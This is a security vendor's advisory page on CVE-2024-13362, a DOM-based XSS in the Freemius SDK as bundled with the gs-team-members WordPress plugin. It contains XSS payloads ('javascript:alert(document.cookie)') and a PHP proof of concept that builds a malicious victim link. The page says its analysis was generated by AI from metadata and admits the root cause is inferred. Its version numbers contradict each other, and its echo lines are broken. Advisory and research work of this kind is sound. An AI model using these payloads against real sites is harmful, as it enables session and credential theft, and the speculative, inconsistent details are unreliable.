What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting vulnerability found in the Freemius SDK, affecting versions 2.10.1 and earlier. It allows unauthenticated attackers to inject arbitrary web scripts via the ‘url’ parameter, which can execute if a user clicks a malicious link.

How does this vulnerability work?

The vulnerability occurs when the ‘url’ parameter is processed by client-side JavaScript without proper sanitization. An attacker can craft a link containing a malicious payload in the ‘url’ parameter, which executes in the victim’s browser when they click the link.

Who is affected by this vulnerability?

Any WordPress site using the Freemius SDK version 2.10.1 or earlier is potentially vulnerable. This includes sites utilizing plugins or themes that bundle this SDK, making them susceptible to XSS attacks.

How can I check if my site is vulnerable?

Check the version of the Freemius SDK used by your plugins or themes. If you are using version 2.10.1 or earlier, your site is vulnerable. Review your installed plugins and themes to identify any that may include the affected SDK.

What is the CVSS score and what does it mean?

The CVSS score for CVE-2024-13362 is 6.1, categorized as Medium severity. This indicates a moderate risk level, suggesting that while the vulnerability can lead to significant issues, it requires user interaction for exploitation.

How can I fix or mitigate this issue?

To mitigate this vulnerability, update to version 2.6.1 or higher of the GS Team Members plugin or any newer version of the Freemius SDK. Additionally, ensure proper input validation and output escaping in your client-side scripts.

What are the potential risks if this vulnerability is exploited?

If exploited, the attacker can execute arbitrary JavaScript in the victim’s browser, leading to session hijacking, credential theft, or unauthorized actions on behalf of the user. Since no authentication is required, any visitor could be targeted.

What is a proof of concept in this context?

The proof of concept illustrates how an attacker can create a malicious link that exploits the vulnerability. It shows how the ‘url’ parameter can be manipulated to inject a script that executes when a victim visits the crafted URL.

How can I implement a Content Security Policy (CSP)?

To implement a CSP, add a `Content-Security-Policy` header to your web server configuration. This policy can restrict script sources and help mitigate the impact of XSS vulnerabilities by preventing unauthorized scripts from executing.

What should I do if I cannot update my plugins immediately?

If immediate updates are not possible, consider disabling the affected plugins or themes until a patch is applied. Additionally, educate users not to click on suspicious links and monitor your site for unusual activity.

Are there any tools to help identify vulnerable plugins?

Yes, there are various security plugins and scanning tools available for WordPress that can help identify vulnerabilities in your site. Tools like WPScan or Sucuri SiteCheck can assist in detecting outdated or vulnerable plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 7, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (gs-team-members)

CVE ID CVE-2024-13362

Plugin gs-team-members

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 2.5.8

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based):

This is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability in the Freemius SDK, version 2.10.1 and earlier, which is bundled within multiple WordPress plugins and themes. The vulnerability allows unauthenticated attackers to inject arbitrary web scripts via the ‘url’ parameter. The attack requires user interaction (clicking a link) to execute the malicious payload. The CVSS score is 6.1 (Medium), indicating a moderate severity with low impact to confidentiality and integrity, and no impact to availability.

Root Cause: The CWE classification (79) and description point to improper neutralization of input during web page generation, specifically a failure to sanitize the ‘url’ parameter or escape output before rendering it client-side. Based on the DOM-based XSS classification and the Freemius SDK context, Atomic Edge analysis infers that the vulnerable code likely passes the ‘url’ parameter directly into JavaScript-manipulated DOM elements (e.g., via `innerHTML`, `document.write`, or `location` assignment) without encoding. This is a typical DOM XSS pattern where the attacker controls a URL fragment or query parameter that the client-side script processes. Since no source code diff is available, this conclusion is inferred from the CWE and CVSS vector (which shows scope change, indicating client-side impact).

Exploitation: An attacker crafts a malicious link containing an XSS payload within the ‘url’ parameter. The link points to a page on a site using any vulnerable plugin/theme that includes the Freemius SDK. When a victim clicks the link, the Freemius script reads the ‘url’ parameter from the URL (likely via `location.href` or `URLSearchParams`) and injects the payload into the DOM without sanitization. For example, the URL could be: `https://victim-site.com/?url=javascript:alert(document.cookie)` or a more stealthy encoded variant. The payload executes in the victim’s browser context, bypassing server-side protections because the vulnerability is entirely client-side.

Remediation: The fix requires proper output escaping and input validation on the client-side script. The Freemius SDK must encode or sanitize the ‘url’ parameter before inserting it into the DOM. Using `textContent` instead of `innerHTML`, or applying proper URL encoding and validation (e.g., checking the protocol is HTTP/HTTPS) would prevent script injection. Additionally, implementing a Content Security Policy (CSP) with `script-src` restrictions can mitigate DOM XSS even if the SDK contains a flaw. Atomic Edge analysis recommends updating to the patched version (2.6.1) of the GS Team Members plugin, or any higher version of Freemius SDK.

Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser within the context of the vulnerable site. This can lead to session hijacking (stealing cookies), credential theft via phishing overlays, defacement, or performing actions on behalf of the authenticated user. Since no authentication is required for the attack vector, any visitor to the site is a potential target. The scope change in the CVSS vector (C) confirms that the compromise affects the user’s browser (client-side), not the server.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// Assumptions:
// 1. The vulnerable Freemius SDK is used by any plugin or theme on the target WordPress site.
// 2. The 'url' parameter is read from the URL by client-side JavaScript and injected into the DOM without sanitization.
// 3. The specific endpoint is not AJAX-based; the vulnerability is triggered by the victim visiting a crafted URL.
// 4. The PoC demonstrates the attack vector by generating a malicious link.

$target_url = 'https://example.com'; // Replace with the victim site's URL

// The payload: an XSS vector that executes after page load.
// The exact injection point depends on the Freemius SDK script, but common patterns include:
// - Using the 'url' parameter in an anchor target or redirect.
// - Setting window.location or modifying DOM attributes.
// We use a simple JavaScript payload that triggers an alert for demonstration purposes.
// In a real attack, the payload would steal cookies or perform other malicious actions.
$xss_payload = 'javascript:alert(document.domain)'; // Standard XSS vector for URL-based DOM XSS

// Build the malicious URL
$malicious_url = $target_url . '/?url=' . urlencode($xss_payload);

// Display the crafted link
echo "[+] Atomic Edge PoC for CVE-2024-13362n";
echo "[+] The following URL, when visited by a victim, will trigger XSS if the target uses a vulnerable Freemius SDK version:n";
echo $malicious_url . "n";
echo "[+] Note: This requires user interaction (clicking the link). The exact DOM injection method depends on the SDK version.n";
echo "[+] Ensure you have permission to test this against the target site.n";

// Optionally, send a request via cURL to check if the parameter is reflected?
// However, since this is a DOM-based XSS, server-side response may not contain the payload.
// So we do not attempt to automate exploitation; we just generate the link.

Frequently Asked Questions

What is CVE-2024-13362?
Understanding the vulnerability
CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting vulnerability found in the Freemius SDK, affecting versions 2.10.1 and earlier. It allows unauthenticated attackers to inject arbitrary web scripts via the ‘url’ parameter, which can execute if a user clicks a malicious link.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability occurs when the ‘url’ parameter is processed by client-side JavaScript without proper sanitization. An attacker can craft a link containing a malicious payload in the ‘url’ parameter, which executes in the victim’s browser when they click the link.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Freemius SDK version 2.10.1 or earlier is potentially vulnerable. This includes sites utilizing plugins or themes that bundle this SDK, making them susceptible to XSS attacks.
How can I check if my site is vulnerable?
Verifying your WordPress installation
Check the version of the Freemius SDK used by your plugins or themes. If you are using version 2.10.1 or earlier, your site is vulnerable. Review your installed plugins and themes to identify any that may include the affected SDK.
What is the CVSS score and what does it mean?
Understanding severity levels
The CVSS score for CVE-2024-13362 is 6.1, categorized as Medium severity. This indicates a moderate risk level, suggesting that while the vulnerability can lead to significant issues, it requires user interaction for exploitation.
How can I fix or mitigate this issue?
Recommended remediation steps
To mitigate this vulnerability, update to version 2.6.1 or higher of the GS Team Members plugin or any newer version of the Freemius SDK. Additionally, ensure proper input validation and output escaping in your client-side scripts.
What are the potential risks if this vulnerability is exploited?
Consequences of successful exploitation
If exploited, the attacker can execute arbitrary JavaScript in the victim’s browser, leading to session hijacking, credential theft, or unauthorized actions on behalf of the user. Since no authentication is required, any visitor could be targeted.
What is a proof of concept in this context?
Demonstrating the vulnerability
The proof of concept illustrates how an attacker can create a malicious link that exploits the vulnerability. It shows how the ‘url’ parameter can be manipulated to inject a script that executes when a victim visits the crafted URL.
How can I implement a Content Security Policy (CSP)?
Enhancing security measures
To implement a CSP, add a `Content-Security-Policy` header to your web server configuration. This policy can restrict script sources and help mitigate the impact of XSS vulnerabilities by preventing unauthorized scripts from executing.
What should I do if I cannot update my plugins immediately?
Interim protective measures
If immediate updates are not possible, consider disabling the affected plugins or themes until a patch is applied. Additionally, educate users not to click on suspicious links and monitor your site for unusual activity.
Are there any tools to help identify vulnerable plugins?
Using security tools
Yes, there are various security plugins and scanning tools available for WordPress that can help identify vulnerabilities in your site. Tools like WPScan or Sucuri SiteCheck can assist in detecting outdated or vulnerable plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations